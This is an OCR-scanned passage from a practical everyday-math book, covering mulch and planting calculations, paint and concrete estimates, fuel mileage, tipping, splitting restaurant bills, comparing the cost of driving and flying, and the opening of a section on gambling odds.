volume (cubic feet) = 10 x 4 x 0.167 
volume (cubic feet) = 6.68 


The answer is 6.68 cubic feet. (You read more about 
calculating volume in Chapter 2.) 


. Calculate how many bags you need. 


To calculate, just divide the volume you need by the 
number of cubic feet in a bag. Where I live, redwood or 
cedar bark is typically sold in 3 cubic foot (CF) bags. 


mulch needed (bags) = 668 


mulch needed (bags) = 2.23 


The answer is 2.23 bags. You can buy three bags and use 
the leftover bark in another bed. 


The calculations you use for seeding and mulching work the same 
way for applying compost or manure. 
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There are many mulches. In California, redwood bark is really 
popular. An eco-friendly mulch is rubber mulch, made from (1 
kid you not) ground-up tires. Unfortunately, math can’t help you 
decide which mulch you prefer. 


Planting the seeds of success — 
mathematically 


A challenge to gardeners is figuring out how many plants you have 
space for. To get the answer, you need to know how large your 
plot is and how far apart the plants need to be. Say you love leaf 
lettuce so much that you want to fill a 2 foot by 4 foot raised 
vegetable plot with it. If you use a modern method of gardening, 
such as the French intensive method or Mel Bartholomew’s square 
foot gardening method, the plants need only be spaced 4 inches 
apart. 


1. Measure the size of the area you want to plant. 


As noted, in this example, assume you want to plant a 
2 foot x 4 foot area. 


2. Figure how many plants you can fit in a foot; then 
multiply that number by the number of feet in a row and 
subtract 1. 


Assume you want your plants to be 4 inches apart. Because 
4 inches (the space between plants) is 1/3 foot, you get 3 
plants per foot. And because you have 4 feet in each row, 
you calculate that you can fit 12 plants in each row, right? 
Not quite. Don’t forget to subtract 1. If you don’t subtract 1, 
the last plant in each row bumps up against the edge of the 
raised bed. Figure 8-1 illustrates the problem. 


plants in a row = length of row (feet )x number of plants per foot —1 
plants in a row =(4x3)-1 

plants ina row =12-1 

plants in a row =11 


3. Repeat Step 2 for the other dimension to determine the 
number of rows you have. 


This time the calculation is (2 x 3) - 1, giving you 5 rows. 
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Figure 8-1: You need to adjust your calculations so that your rows of plant don't 
run into the edge of the bed. 


4. Multiply the number of plants in a row by the number of 
rows. 


In the example, you have 5 rows and 11 plants in a row, so 
the correct answer is 55 plants. 


Note that real life math isn’t always the same as classroom 
math. It often pays to make a sketch to help you visualize 
what you want to do. 


Knowing how much you really mow 


Mowing the lawn doesn’t have any unusual math, right? Wrong! 
When you mow the lawn, you often mow about twice the area of 
the lawn. That’s due to using the halfpass technique. With the 
half-pass technique, when you mow a strip of lawn, you don’t move 
over a full width for the next row; instead, you move over about 
half a row. With this technique, you mow what amounts to a 
narrower strip, but the job’s easier, and you don’t miss any 
patches. Yes, it’s really a full pass in length, but it’s known as a 
half-pass because each pass covers only half the width of a row. 


To find out what you’re really cutting, you need to know the width 
of your lawn mower and the width of the yard. (This example uses 
a 22-inch rotary mower and a lawn that’s 20 feet wide.) Then follow 
these steps: 
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1. Calculate the number of inches in the width of the lawn. 


To do so, you multiply the number of feet by 12 (the 
number of inches in a foot). If the lawn is 20 feet wide, the 
math would look like this: 


width of lawn (inches) = 12 x 20 
width of lawn (inches ) = 240 


2. Calculate the number of full passes by dividing the width 
of the lawn (in inches) by the width of a pass (for this 
mower, 22 inches). 


width of lawn (inches ) 
width of pass (inches ) 


number of passes = 20 


number of passes = 10.9 


number of passes = 


The answer is 11 full passes. That’s what you’d cut if you 
didn’t allow for half-passes. 


3. The number of so-called half-passes is about the same 
as the number of full passes. Add them together. 


11 +11 = 22 
You'll make 22 total passes over the lawn. 


Whether you share this information with the kid you pay to 
mow your lawn is entirely up to you. 


Fixing Up the Place 


You can make your home more attractive and useful by fixing it up, 
and if you own your own home, improvements often help its value. 
But most home maintenance or redecorating projects require 
some facility with math, whether you plan to tackle the jobs yourself 
or hire experts to do them for you. The next sections tell you how 
to do the calculations for a few common projects. As always, you 
can apply these calculations to other tasks. 


Laying carpet 


New carpeting does a room a world of good, but it usually makes 
a dent in your wallet, whether you’re buying more economical 
brands or the best the market has to offer. The basis for carpeting 
costs is the area of the room you want to carpet. Mathematically, 
the task is pretty simple: Calculate an area (square feet) and then 
do a unit conversion from square feet to square yards, because 
carpeting is sold in square yards. 
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Follow these steps: 


1. Calculate the area of the room. 


Say you’re carpeting a large living area that’s 18 feet by 24 
feet. Multiply the length by the width: 


area (square feet) = length (feet) x width (feet) 
area (square feet) = 18 x 24 
area (square feet) = 432 


The area of the room is 432 square feet. 
2. Convert from square feet to square yards. 


Carpet is usually sold by the square yard. One square yard 
is equal to 9 square feet. (Imagine a square 3 feet long and 
3 feet wide.) To make the conversion, you divide the area 
in square feet by 9: 


area (square yards) = Be 


area (square yards) = 48 


The area is 48 square yards. 


To determine the cost of the carpet, you multiply the cost per 
square yard by the number of square yards. But don’t forget that 
you'll be buying a carpet pad, as well, and, if you opt for professional 
installation, you’ll have to pony up the per-yard cost for that, too. 


Calculating paint amounts 


Painting a room is easy. You need the right equipment, and of 
course, you should buy the right amount of paint. 


The amount of paint you need is based on the square footage the 
paint must cover. And the best shortcut in calculating square 
footage is to take the height of the room (in feet) and multiply that 
by the room’s perimeter. 


Here’s the painless way to calculate your paint requirements: 


1. Calculate the perimeter of the room. 


Measure the room around the baseboards to get the 
perimeter. Alternatively, if your room is rectangular, take 
the length of the room and double it, take the width of the 
room and double it, and then add the two values together. 
Here’s the calculation for a 9 foot by 12 foot rectangular 
room: 
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perimeter (feet) = 2 x length (feet) + 2 x width (feet) 
perimeter (feet) = (2x9)+(2x12) 

perimeter (feet) = 18+ 24 

perimeter (feet) = 42 


The perimeter is 42 feet. 


2. Calculate the area of the walls by multiplying the 
perimeter by the wall height. 


In the United States, the standard height of a room is 8 feet. 
If your walls are 8 feet tall, multiply the perimeter by 8: 


area (square feet) = perimeter x wall height 
area (square feet) = 42 x 8 
area (square feet) = 336 


The wall area is 336 square feet. 


Subtracting the areas of doors and windows from the total 
area usually isn’t productive. Having a little paint left over 
is better than running out. 


3. Calculate the number of one-gallon cans of paint you’ll 
need. 


First-class paint claims that “one coat covers.” For this next 
calculation, assume that’s true. If you want to buy paint 
that covers is 400 square feet (sf) per gallon, you do the 
following calculation to see how many gallon cans you 
need: 


336 (square feet to cover) 
400 (square feet from 1 can) 


number of cans = 
number of cans = 0.84 


The answer is about 0.84 cans. That’s one 1-gallon can. 


Pouring a patio 


Pouring a concrete patio is a great exercise in practical math, and 
you get a nice patio for your efforts. The main task is to determine 
how much concrete you need. To find out, you calculate an area 
(in square feet), then volume (in cubic feet), and finally do a unit 
conversion (from cubic feet to cubic yards). 
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Most patios are rectangular, but if your patio has angles or curves, 
you can figure out the area by calculating each part and adding 
them up. Figure 8-2 shows typical shapes of parts of a patio. 
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Figure 8-2: Typical shapes you find in a patio. 


I cover the formulas for finding the areas of rectangles, triangles, 
and circles in Chapter 2. To find the area of a half circle, like the 
one shown in Figure 8-2, you just find the area of the full circle and 
divide it by 2. 


To determine how much concrete you need to pour a cement 
patio, follow these steps: 


1. Calculate the area of the patio. 


Assume you want to pour a 20 foot by 40 foot rectangular 
slab. (I have a friend who used this shape just outside his 
back sliding door.) You multiply the length by the width: 


area (square feet) = length (feet) x width (feet) 


area (square feet) = 20 x 40 
area (square feet) = 800 


The area is 800 square feet. 


2. Calculate the volume of the patio by multiplying the area 
by the depth (in feet). 


A patio should be a minimum of 3.5 inches thick, but 
greater depth is better, especially if you’re pouring the 
patio over expansive soil. For this example, imagine that 
you want your patio to be 6 inches thick, which just happens 
to be 0.5 feet (remember, you need to use the same units 
throughout your calculation). 


volume (cubic feet) = area (square feet) x depth (feet) 
volume (cubic feet) = 800 x 0.5 
volume (cubic feet) = 400 
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The volume is 400 cubic feet. 
You can save a step by using the formula for volume: 
volume = length x width x depth 

3. Convert from cubic feet to cubic yards by dividing by 27. 


Concrete is sold by the “yard,” which means cubic yards. 
One cubic yard is equal to 27 cubic feet. (Imagine a cube 3 
feet long, 3 feet wide, and 3 feet tall.) To find cubic yards in 
the example, just divide the volume (400 cubic feet) by 27. 


volume (cubic yards) = 40 


volume (cubic yards) = 14.8 
The volume is 14.8 yards. 
Similar calculations work for decks, too. You determine the area 


to be decked and do a unit conversion — but in this case, you 
convert from area in square feet to board feet for buying the lumber. 


Doing it yourself versus hiring a pro 


What's the math (which amounts to cost savings) in “do it yourself” (DIY) work? The 
principle of making cost comparisons is universal throughout this book: Calculate 
the components of alternative choices, add the components up, and then compare 
the prices. 


The big differentiator in DIY is the cost of labor. The calculation is simple: 
total contractor cost = materials +contractor labor 
total DIY cost = materials + your labor ( $0.00 ) 


cost savings = total contractor cost—total DIY cost 


Although doing a task yourself may be satisfying and result in big savings, you've 
got to ask yourself some questions in a few key areas: 


Special tools: Do you have all the special equipment the job may require? 
Skill: Do you know what you're doing? Does it matter? 


Quality of work: Can you do the job well? Contractors are in business to deliver 
quality work. 


Timing: How long will it take you to do the job? A contractor can usually get the 
job done faster. 
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Interest and enthusiasm: Do you wantto do the job? If you like the work, rock 
on. If not, consider a contractor. 


Value of your time: Is it worth it? If you make $350.00 per hour as an attorney, 
common sense says that you'd be better off doing attorney work and leaving 
home improvements to a professional craftsperson. 


Opportunity cost: In economics, opportunity cost is defined as the value of the 
next best alternative when you choose to use your time (and money) for one 
activity instead of another. It's what you don’t get to do if you choose an activ- 
ity. For example, instead of doing a DIY project, would you rather go boating or 
write a novel? 
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Chapter 9 


Math and Statistics around 
Town and on the Road 


In This Chapter 
Calculating gas mileage, miles per gallon, distance, and more 
Figuring out how to calculate tips and divide a bill 
Choosing between flying and driving for vacation travel 
Using math to improve your odds of winning when you gamble 


N o matter where you go, you’ll want to know a few real-life 
math calculations. If you drive a car, you benefit from looking 


at regular driving and maintenance costs. If you like to go out to 
eat, math can help you calculate a tip or split a bill with ease. If 
you're planning a vacation, math can help you decide whether to 
go by plane, train, or automobile. And if your vacation should take 
you to Atlantic City, Las Vegas, or the fabled Monte Carlo, being 
able to calculate (or at least know) odds comes in mighty handy. 
The math-savvy gambler is a better gambler. 


In this chapter, you find out what math to use in the places where 
you spend your time and money. The math works anywhere you go. 


Automobile Arithmetic: Figuring 
Costs, Mileage, and More 


Americans love to drive, and transportation drives American culture. 
People spend a lot of money for their vehicles. In fact, a car is 
usually the second biggest asset you own, after your home. 


In addition to the cost of the car — and the interest you pay on the 
loan — cars have other expenses associated with them, too: fuel, 
insurance, and maintenance, for example. If you want to know how 
to figure how much your car loan is actually costing you, head to 
Chapter 10. But for other car-related calculations, keep reading. 
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It’s a gas! Comparing fuel 
prices and mileage 


The cost of gassing up isn’t trivial. Fuel prices generally move 

in one direction — up. You feel it in your pocketbook, and the 
environment feels it, too. A country that burns a lot of hydrocarbons 
doesn’t have nice air to breathe. China is a prime example of this. 
One obvious way to save money (and help the environment) is to 
be conscious of your gasoline mileage. Another way is to compare 
gas prices. 


We call the instrument with “E” (for empty) and “F” (for full) a 
gas gauge, but fuel gauge would be a better term. Diesel fuel isn’t 
gasoline, although an E85 blend is. Biofuels are something else. 
Get ready! As more electric cars take to the roads, “fuel” will be 
measured by a state of charge (SOC) meter. 


Calculating mileage 


You measure fuel economy in miles per gallon (mpg) in the United 
States. Other countries measure it in kilometers per liter (kpl). No 
matter how you measure it, driving a long distance using a minimum 
amount of fuel gives you a nice feeling. 


Manufacturers tell you the average mileage of their vehicles, but 
they determine their figures under controlled driving conditions. 
To perform your own mileage calculations, you use a simple 
calculation: Divide the number of miles you drive on a full tank by 
the number of gallons in your tank. 


For example, say your tank holds 20 gallons, and you drive 360 miles 
on that tank: 360 = 20 = 18. You get 18 miles per gallon. The number 
is approximate, since most people won’t drive until their tanks are 
completely empty before filling up. So consider driving until you’ve 
used up about 3/4 of the gasoline (15 gallons in the 20-gallon 
example). Repeat the calculations a few times, and you'll have a 
pretty good idea where your mileage stands. By the way, you can 
look up your tank’s capacity in your car’s owner’s manual. 


Car and truck advertising on the Internet sometimes buries fuel 

economy figures, because some luxury vehicles and big trucks are 
gas guzzlers. For the straight skinny on fuel economy, visit the U.S. 
Department of Energy website at http: //www. fueleconomy.gov/. 


Chasing down a good gasoline price 


The cost of fueling is easy to calculate. Simply multiply the 
per-gallon price of the fuel by the number of gallons you buy 
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(cost = gallons x price per gallon). In fact, you don’t even have to 
do the calculation because the information is on the computerized 
receipt that the pump gives you at the end of fueling. 


Here’s a question that drivers frequently ponder, though: Should 
you drive across town for a lower gas price? The short answer is 
no. Never drive across town for a lower gas price. Gas prices 
usually vary by no more than maybe $0.05 (5 cents) per gallon. The 
math will show that you lose money by driving to save money. 


Say you get 30 mpg and have to drive 5 miles out of your way to 
get a better gas price. That’s a 10 mile round trip and consumes 
1/3 of a gallon. If gas is selling for $3.60 per gallon (and that’s low), 
you’ve used $1.20 worth of fuel. To make the trip worth your time, 
you need to save significantly more than $1.20. 


If you have a 12 gallon tank (as I do), and the gasoline at the distant 
station is selling for $0.10 per gallon less than at your usual station, 
you end up breaking exactly even (12 gallons x 0.10 = $1.20). You 
don’t save anything — and think about the time you wasted! 


If you happen to shop for groceries at a major store that has a “gas 
island” at the far edge of the parking lot, buy your gas there. The 
gas price is usually lower, either because the store sets it low to 
attract shoppers or because you can get a per-gallon discount as a 
“Club Member.” 


If you are completely insane (as | am) you can compare gas prices over time by 
keeping a log. Use a spreadsheet program. The image here shows a detailed 
fuel log. The log not only shows you gas mileage, but it also shows you how local 
gas prices are trending and what you paid on a long drive. As a bonus, you can 
calculate days between fill-ups, changes in price, percent change in price, and 
average miles driven per day. 


The joys of a fuel log 


Days 
Between | Change | Percent | Miles 


TANK| ODO|MILES| GALS} MPG |$/GAL|TOTAL$| DATE] Fill-Ups|in Price | Change | per Day 
33 | 104024 305 | 10.092 | 30.222 | $4.019| $40.56 | 06/07/11 25) (0.21) | -4.97% 12.20 | GV 
34 | 104359 335 | 10.999 | 30.457 | $3.959 | $43.55 | 06/26/11 19) (0.06)| -1.49% 17.63 | GV 
35 | 104729 370 | 10.481 | 35.302 | $3.759| $39.40 | 07/12/11 16| (0.20) | -5.05% 23.13 | GV 
36 | 104912 183| 6.033 | 30.333 | $3.799} $22.92 | 07/19/11 23] (0.16) | -4.04% 7.96 | GV 
37 | 105302 390 | 10.324 | 37.776 | $4.049| $41.80 | 07/20/11 8 0.29} 7.71% 48.75 | Elko, NV 


105668 366 | 10.008 | 36.571 | $3.669 | $36.72 | 07/21/11 (0.38) | -9.39% | 366.00 | Idaho Falls, ID 


106027 359| 9.565 | 37.533 | $3.599| $34.42 | 07/26/11 (0.07) | -1.91% | 71.80 | Pocatello, ID 


1 

5 
106396 369 | 10.445 | 35.328 | $3.839 | $40.10 | 07/26/11 1 0.24] 6.67% | 369.00 | Battle Mountain 
106783 387 7 


107092 309 
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Are we there yet? Figuring 
distance, time, and spee 


When you travel in an automobile, you can’t help but ponder life’s 
deep questions. How long have I been driving? How much more 
time will my drive take? How far have I traveled? How many miles 
are left to go? What’s my average speed? It’s handy to be able to 
compute distance, time, and speed, because the answers take 
some of the mystery out of making a trip. (Doing the calculations 
helps fight boredom, too.) 


Distance, time, and speed (formally called velocity) combine to 
make a great formula. When you know two of the items, you can 
solve for the third. Here are the three formulas: 


distance = time x speed 


_ distance 
speed = time 
time- distance 

speed 


Estimating arrival time 

Estimating when you'll arrive at your destination is an easy 
calculation using the formula for time. You need to know the miles 
left to drive (info you can get from highway signs) and your speed 
(just glance down at your speedometer). Say that you have 

75 miles to go and are driving at 60 mph. With these two bits of 
information in hand, apply the time formula: 


speed 


time = 1.25 
You should arrive in 1.25 hours. 


Don’t want to do the math yourself? If you have a GPS, it’ll do the 
job for you. 
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GPS 


A global positioning system (GPS) navigation device is filled with amazing information. 
After you enter a destination, the GPS tells you the estimated time of arrival (ETA), 
remaining hours and minutes until arrival, remaining distance, and your current 
speed. As a bonus, you also get an irritating voice that says, “Return to the nearest 
road.” 


Actually, your GPS is more accurate than your dashboard instruments, in particular 
the speedometer. Speedometers are subject to mechanical errors, and you can't 
calibrate them. By contrast, your GPS is reaching out to at least three satellites at 
any given moment, and the data is recomputed about every 50 feet of travel. 


<e 


Quick math for distance traveled and distance left to drive 


If you can subtract (and you can), you'll have no problem calculating 
how far you’ve traveled or how far you have left to drive. 


To see how far you've traveled, look at your trip odometer, an 
instrument that shows distance traveled. Some cars have as many 
as three odometers: the regular one, Trip 1, and Trip 2. You can 
switch between them and can easily reset Trip 1 and Trip 2 to 0. 


If you have only one odometer, just subtract its current reading 
(your current location on the road) from the reading you took on 
your departure. 


Distance traveled = current location reading — departure reading 
Distance traveled = 23,331.5 — 23,130.0 
Distance traveled = 201.5 


Keep in mind, however, that real-life math often requires no math 
at all. If you have a trip odometer, you can find the distance traveled 
just by resetting the odometer to 0 at the start of your trip and 
reading the mileage at any time during the trip. 


You can use Trip 1 for measuring the distance covered on an out- 
of-town day trip, while using Trip 2 to accumulate how many miles 
you’ve driven on the current tank of gas. 
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Speed-o-meter 


The speedometer is an instrument that tells you how fast you're going. It was 
invented in 1888, and people have been speeding ever since. It shows speed in 
miles per hour (mph) and kilometers per hour (kph). Most speedometers have 
analog displays (like an older wristwatch), but some have digital displays. 


Driving at or below the speed limit should keep you free from speeding citations (a 
real money-saver). And, generally speaking, driving faster takes more gasoline (or 
diesel fuel) and lowers your mileage. 


ar 


Want to see how far you have left to drive? Here’s another 
non-math real-life math solution: Use the highway mileage signs. 


Estimating average speed 


Your speedometer shows your speed at any given moment, but a 
drive might include stop-and-go traffic in town as well has fairly 
smooth driving on the highway. Calculate your average speed 

by dividing the total distance you’ve driven (from the odometer) 
by the time you’ve been traveling (from the car’s clock or your 
watch). For example, if you’ve driven 50 miles in 2 hours — 

50 + 2 = 25 — your average speed is 25 miles per hour. 


Making sense of the mechanic’s bill 


Your automobile mechanic charges for materials and time (or 
labor). Your bill reflects parts used and labor hours expended. But 
if you want to know the cost before you commit to a repair, simply 
ask for a written estimate (in which the shop will calculate the 
approximate cost for you). 


If you don’t want to take your car in for an estimate, do some 
Internet research to find the cost of the parts you need and the 
industry standard time required to complete the job. Then just ask 
your mechanic what the shop’s hourly labor rate is. Now that you 
know these things, you can use math to create your own estimate. 


Self-estimating works when you know just what you want to do 
(for example, replace a fuel pump). However, if your car has an 
unknown problem (for example, “It makes a funny noise when I 
turn the wheel to the left”), you should take it into the shop for a 
diagnosis. 
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The formula for time and materials is very simple. You just add 

up the cost for the labor (which you calculate by multiplying the 
number of hours worked by the shop’s hourly labor rate), the cost 
of the parts, and any applicable tax. Here’s an example of the 
formula with values plugged in: 


total charges = (hours x hourly rate) + parts + tax 
total charges = (4.17 x $89.928 ) + $390.40 + $30.74 
total charges = $375.00 + $390.40 + $30.74 

total charges = $796.14 


In this example, hours are figured to two decimal places (hun- 
dredths of an hour). The labor rate is figured to three decimal 
places. The sample calculation is exactly what it cost me to replace 
a timing belt on my 2005 Honda Civic. 


The charges are based on the cost of parts and the cost of labor. 
Figure 9-1 shows the detail from the automobile repair bill. 


Part Description /Number Qty Sale Extended Labor Description Hours Extended 
Timing Belt Kit Cust wants timing belt replaced N/A N/C 
2523120 1.00 218.90 218.90 
Water Pump New TIMING BELT - Remove & Replace - 4.17 375.00 
41115 1.00 68.15 68.15 | 1.7L Eng - [Includes: Adjust Valves.] 
Serp Belt Replace timing belt and all timing belt 
25-060388 1.00 23.67 23.67 | pullies, water pump and drive belts. Refill 
Serp Belt system with new coolant and test drive. 
25-040398 1.00 17.95 17.95 
Honda Long Life Antifreeze 
OL999-9011 1.00 25.18 25.18 
Lower Timing Belt Cover 
1811-PLC-000 1.00 36.55 36.55 
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Figure 9-1: Details on an automobile repair bill. 


When you take your car in to be serviced, you'll likely be given a 
less-detailed written estimate. When you get the final bill, you’ll see 
the details. 


As Figure 9-1 shows, you multiply the quantity (“Qty”) by the price 
(“Sale”) to get the full cost of a part (“Extended”). Labor charges, 
on the other hand, can be a little bit baffling. To get this amount, 
the mechanic looks up the repair in a repair labor guide (“the 
book”), which is a list of standard rates for the type of job to be 
done. The book lists the time it generally takes to perform a given 
repair (a timing belt job is 4.17 hours, for example, as is the case 
in this figure). Some guides also show “regular flat rate” and 
“severe-condition flat rate.” The “severe-condition flat rate” applies 
when particular factors (like rust and corrosion) are present that 
necessitate more time and more tools to do the repair. 
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Dining Out 


People everywhere love to dine out, whether they go to drive-ins, 
cafés, bistros, taverns, fast food drive-thrus, or five-star restaurants. 
Chances are you know what kind of cuisine or experience you’re in 
the mood for. So whereas comparing prices is a key part of making 
other buying decisions, it’s not so much a concern when you’re 
choosing where to eat out. Instead, the math you’re most likely to 
use at a restaurant involves figuring out how much to tip and how 
to split a bill when you’re dining with others. 


Calculating the tip 


Although tipping doesn’t exist in some countries, in the United 
States, your restaurant server expects a tip. Breakfast, lunch, or 
dinner, you always have to tip. The customary amount is between 
15 and 20 percent of the bill. Sometimes you tip a little more; 
sometimes you tip a little less. 


The easiest way to calculate a 15 percent tip is to follow these 
steps: 


1. Divide the check by 10, which gives you 10 percent of the 
total. 

2. Take half of the 10 percent, giving you 5 percent. 

3. Add both values together, and that’s your 15 percent tip. 


Here’s an example for a $16.00 meal: 


tip = (check price x 0.10) + (check price x 0.05) 
tip = ($16.00 x 0.10) + ($16.00 x 0.05) 

tip = $1.60 + $0.80 

tip = $2.40 


That’s your tip. If you like, round the $2.40 up to $3.00. 


Calculating a 20-percent tip is even easier. Simply divide the total 
by 10 and then double the result. Here’s the math: $16.00 = 10 = 
$1.60 x 2 = $3.20. Your tip is $3.20. 


You tip in other places, too, and the amount of the expected tip 
varies by type of service and by region. Here’s a quick guide to 
what you should tip for different services: 
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Service/Person Customary Tip 

Hair stylist 15-20 percent 

Shampoo person $2.00 ($5.00 in Beverly Hills) 
Manicurist 15 percent 

Hotel bellhop $1.00 per bag 

Hotel maid $5.00-$10.00 per stay 

Skycap at airport $1.00 per bag 

Bartender $1.00 per round of drinks 

Coatroom attendant $1.00 

Valet $1.00 at the mall, $2.00 at a nice hotel 


Splitting hairs and bills 


You’ve probably gone out with a group of friends or the gang from 
the office. Did you ever get skinned when the bill came? Though 
they mean no harm, some of your friends or co-workers may 
miscalculate what they owe, forget drinks they ordered, and get 
amnesia about tipping, leaving you holding the bag. The old rule of 
thumb for work lunches used to be, “Don’t be the last one to leave 
the table.” 


No more. When your group is settling up, pull out your smart- 
phone, the one with the great calculator, and then calculate each 
person’s food, tax, and tip charges. Here’s the calculation: 


total = (food + drink) + tax + tip 


Follow these steps: 


1. Figure out the total food and drink cost for each diner. 


Say that your friend Wanda ordered a cheeseburger ($6.00) 
and coffee ($2.00). 


$6.00 + $2.00 = $8.00 
Food and drink amounts to $8.00. 


2. Figure the amount of tax for this diner and then combine 
the tax with the food and drink cost. 


Say that sales tax in your area is 9 percent. 
tax = (food + drink ) x tax rate 


tax = $8.00 x 0.09 
tax = $0.72 
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Wanda’s share of the sales tax is $0.72. Combine that with 
the food and drink cost and she owes $8.72 before you 
calculate the tip. 


Some states charge higher than normal tax rates (as high 
as 20 percent total) for mixed drinks. In Arkansas, the extra 
tax is called a “supplemental mixed drink tax.” Keep this in 
mind as you calculate the tax. 


3. Calculate this diner’s tip amount. 


Suppose that your group has agreed that a 15 percent tip is 
fair. 


tip = (food, drinks, and tax) x tip percentage 
tip = $8.72 x 0.15 
tip = $131 


Wanda’s share of the tip should be $1.31. Now return to the 
original full calculation: 


total = (food + drink) + tax + tip 
total = $8.00 + $0.72 + $1.31 
total = $10.03 


Wanda’s share of the bill is $10.03. 
4. Repeat this process for everyone in your party. 


If you do, you’ll have enough money to pay the check. 


Re Stu, For large groups (usually eight or more people, although some 
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restaurants consider a group of six to be “large”), restaurants love 
to charge mandatory tips. In the Olden Days, the amount was 

15 percent, but it has risen to 18 percent and sometimes 20 percent. 
The law says that a tip is mandatory when it’s written on menus, 
in brochures, or in ads. And, if anybody in your group asks you, 
mandatory tips are subject to sales tax. 


Taking a Vacation: 
To Drive or to Fly? 


Some people would say that visiting the Walt Disney World Resort 
(informally known as Disney World) or similar theme parks is a 
dream vacation. Others prefer quiet cabins in the woods or cottages 
on a beachfront. Some like travelling to places where they can take 
in shows or museums. 
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Whatever your dream vacation is, you can calculate the full cost 
pretty easily, simply by adding up the travel expenses, the lodging 
expenses, any necessary ticket purchases, food, and other things, 
such as souvenirs and excursion costs. Figure 9-2 shows expenses 
anticipated by a family of four planning a trip to Walt Disney 
World. 


THE WHOLE VACATION 

Item Cost 
Airfare $1,800.00 
Hotel $1,204.00 
Disney World $952.00 
Rental Car $329.00 
Food $1,120.00 
Souvenirs $300.00 
TOTAL $5,705.00 
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Figure 9-2: Costs associated with a Disney World vacation. 


The quandary that many families face is whether to drive or fly. To 
decide, you need to figure up the costs associated with each mode 
of transportation and then compare them. In the following sections, 
I help you identify the different expenses and explain how to do 
the calculations that can help you decide. 


Leaving on a jet plane 


Traveling by air has obvious advantages, the most significant being 
how quickly you arrive at your destination. But is it always the 
best choice, especially when you're flying with others (like your 
spouse and kids)? 


The first thing to consider is the cost of the airfare. How much 
does a round-trip ticket cost? If you buy at the last minute, you'll 
pay full fare, but if you buy well in advance on the Internet, you'll 
save some big bucks. Multiply the cost of a single ticket by the 
number of people traveling with you. Say that your family is made 
up of you, your spouse, and your two children, ages 8 and 10. (By 
the way, both of your children are “adults” on an airline.) You 
multiply the airfare by 4. 


To determine airfare costs, simply go to the airline’s site to see 
what flights are available and how much the fare is. You can exit 
the site without buying anything, if you’re just investigating. 
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When you travel by air, however, the cost of the plane tickets isn’t 
the only travel expense you'll incur. Here are other costs you need 
to figure in your calculations: 


Long-term parking: To figure parking, multiply the daily rate 
by the number of days you'll be gone. Of course, you can 
ignore this cost if your kind brother offers to drive your family 
to the airport. 


Car rental or transportation fees: Unless you are going toa 
resort that you don’t plan to leave, chances are you'll rent a 
car at your destination or take public transportation or taxis 
to get to various places you want to go. 


After you have the amounts for the expenses you'll incur if you fly, 
add them together. This is the amount you’ll compare to the costs 
associated with driving. 


As an example, say you book airfare well in advance of your 
vacation. The fare is $275.00 to get there and $175.00 to get back. 
Together that’s $450.00 per traveler. Since four people are in your 
party, the airfare would total $1,800.00. 


As a bonus, assume that your family will be dropped off and picked 
up at the airport (no cost!) and that you'll take a free shuttle from 
your destination airport to the resort. 


Driving: The daring alternative 


You didn’t grow up to become a cost accountant, but sometimes 
you have to act like one. You need to do the calculations necessary 
to see whether you save money by driving to your destination. 
Fortunately, the math is pretty simple: addition, subtraction, 
multiplication, and division. 


To calculate roughly how much driving will cost, you first need to 
determine the distance, which will give you an idea of how long 
you'll be on the road. Fortunately, you don’t even have to make 
assumptions or guess. You can use an Internet map to find exactly 
how many miles you'll drive to reach your destination. 


Say you’re diving from Sacramento (near where I live) and heading 
to Disney World. You'll drive 2,890 miles. That’s 45 hours of driving, 
at an average speed of 65 mph. If you can stand driving 8 hours per 
day, you’ll be on the road for a little more than 5 days (45 + 8=5 
with a remainder of 5). You drive into Orlando on the 6th day. 
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After you know how many miles you’re driving and how many days 
you'll be on the road, you can do the other calculations: 


1# Gasoline: To determine how much gas you'll use, divide the 
number of miles by the miles per gallon your car gets. If you 
can get 30 miles per gallon in gas mileage, you'll use 93.33 
gallons getting there (2,890 + 30 = 96.33). Because you also 
have to drive back, double that to get 192.67 gallons. (The gas 
you use driving around Orlando is the same as you'd use in 
a rental car, so it doesn’t matter for this calculation.) But to 
make the math easy, call gas consumption 200 gallons. 


To figure how much you’ll pay for those 200 gallons, multiply 
that by the price of a gallon. If you assume gasoline averages 
$4.00 per gallon over the whole trip, you'll pay about $800.00 
for the gas. 


Hotel: You have to figure the hotel costs for every night you 
spend on the road. The good news is that hotels rates are 
generally cheaper along the route than they are in popular 
destinations. Maybe you can find a place to stay for about 
$90.00 night. Multiply that amount by the number of nights 
you'll be traveling. In the Disney example, you'll be staying 
at hotels for 5 nights and driving into Orlando on the 6th 
day. Your on-the-road hotel costs are $450.00 ($90.00 x 5 = 
$450.00). 


¥ Meals: For each day travelling, figure in the cost for all the 
meals you'll eat en route. In the Sacramento-to-Disney World 
example, you’re on the road for 5 days, you have 4 people 
in your party, and you eat 3 times a day. Multiply to get the 
number of meals you’ll buy while traveling: 5 x 4 x 3 = 60 
meals. Estimate an average meal cost per person per meal — 
say it’s $5.00 — and multiply that by the number of meals: 
60 x $5.00 = $300.00 for food. 


Now, add all the items together: $450.00 + $800.00 + $300.00 = 
$1,550.00. If you compare travel by car ($1,550.00) to travel by air 
($1,800.00) you save a little bit of money ($250.00) by driving. 


There are hidden costs (and maybe benefits) in driving and you 
should be aware of them. You will be spending more than 10 travel 
days in a car with your family. The experience could bring you all 
closer or make you crazy. Also, consider opportunity cost, the value 
of the next best use of your time. You, your spouse, and your 
children will lose 10 days on the road. Maybe there are better 
things to do with your time than driving 5,780 miles. 
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Gambling: Money Vou Take to 
Las Vegas Stays in Las Vegas 


Ah, the lure of the tables! Las Vegas, Atlantic City, and the 
Mississippi River are big destination resorts where, rumor has it, 
you can play casino games. Native American gaming is also wildly 
popular, and there are 400 of these establishments. Besides big 
casinos, many other forms of gambling exist. Some of the most 
popular are lotteries (in the United States, 43 states and the 
District of Columbia have lotteries), office sports pools, and bingo. 


If gambling appeals to you, you’d probably prefer winning to 
losing. That means that you should know some of the math 
involved and be able to calculate one or two important numbers. 


Understanding odds, 
bets, and payouts 


Every casino game consists of placing a bet (sometimes called 
making a wager). Betting applies to non-casino games, too, such as 
card games and parimutuel betting (“playing the ponies”).To state 
the obvious, you bet money that a favorable outcome will occur. If 
it does, you get a payout. 


Knowing your odds 


Odds are the ratio of an unfavorable outcome to a favorable outcome. 
Odds are essentially the same as probability, but expressed 
differently (refer to Chapter 3 more info and some math examples 
related to probability). In rolling a die, the probability of rolling a 

1 is 1 chance in 6, or 1/6. There’s 1 favorable outcome and 

5 unfavorable outcomes. The odds are expressed as 5:1, and you’d 
say it as “5 to 1 against.” 


There are odds for everything from a roll of the dice in craps to 
drawing to an inside straight in poker (which is known as a fool’s 
